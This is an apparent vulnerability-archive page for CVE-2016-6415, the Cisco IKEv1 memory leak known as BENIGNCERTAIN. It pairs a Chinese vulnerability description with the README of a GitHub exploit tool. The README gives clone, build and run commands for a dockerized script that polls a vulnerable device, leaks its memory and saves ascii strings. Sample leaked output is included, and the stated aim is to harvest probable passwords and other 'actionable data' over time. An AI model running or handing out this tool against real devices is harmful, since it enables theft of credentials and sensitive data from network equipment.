关联漏洞
标题:
多款Cisco产品信息泄露漏洞
(CVE-2016-6415)
描述:Cisco IOS等都是美国思科(Cisco)公司开发的操作系统。 多款Cisco产品中的服务器IKEv1实现过程中存在信息泄露漏洞。远程攻击者可通过发送Security Association协商请求利用该漏洞获取来自设备内存的敏感信息。以下产品和版本受到影响:Cisco IOS 12.2 至12.4版本,15.0至15.6版本,IOS XE 3.18S版本,IOS XR 4.3.x版本,5.0.x至5.2.x版本,PIX 7.0之前的版本。
描述
Re-implementation of VirtueSecurity's benigncertain-monitor
介绍
# CVE-2016-6415-BenignCertain-Monitor
Re-implementation of VirtueSecurity's benigncertain-monitor. Doesn't have all the same payload options as the original, but replaces the `bc-id` binary with a better proof of concept by Ross Bradley that can be expanded on if necessary.
## Credits:
- Original monitor written and maintained by VirtueSecurity at https://github.com/VirtueSecurity/benigncertain-monitor
- Proof of concept script used to replace the buggy "bc-id" binary is from Ross Bradley at https://github.com/ross-bradley/benign-certain
```
$ git clone https://github.com/3ndG4me/CVE-2016-6415-BenignCertain-Monitor.git
$ cd CVE-2016-6415-BenignCertain-Monitor
$ sudo docker build . -t benign-monitor
$ sudo docker run -it benign-monitor <host>
```
The service will continuously poll the vulnerable service, extract ascii strings from memory, store the strings in a local sqlite database, and show the most frequently observed strings:
```
Starting monitor against 10.0.6.1
string count
0 5$dx 3
1 0(0 3
2 $c{l 3
3 (0"t&j 3
4 R$dkd$hf7! 2
5 %d1N=8$i- 2
6 $c)P0 1
7 1NlD 1
8 1NlD' 1
9 $c)P(0 1
10 $c)P1@_ 1
```
## Overview
This is a dockerized python script that continuously leaks memory of a target vulnerable to the NSA BENIGNCERTAIN Cisco exploit CVE-2016-6415.
The script polls the vulnerable service over time to identify probable passwords and other potentially sensitive information. This can be used to harvest actionable data over a period of time rather than just a proof of concept exploit.
## TODO:
- [ ] Port exploit code to python3
- [ ] Expand arguments to passthru from the container to the exploit script for better option tweaking
- [ ] Optional: Expand payload options
文件快照
[4.0K] /data/pocs/6291ae7cac096c69db91068a55b951cf738108d1
├── [4.0K] benigncertain
│ └── [1.8K] benign.py
├── [ 178] Dockerfile
├── [ 158] entry.sh
├── [1.4K] poc.py
├── [1.8K] README.md
└── [ 6] requirements.txt
1 directory, 6 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。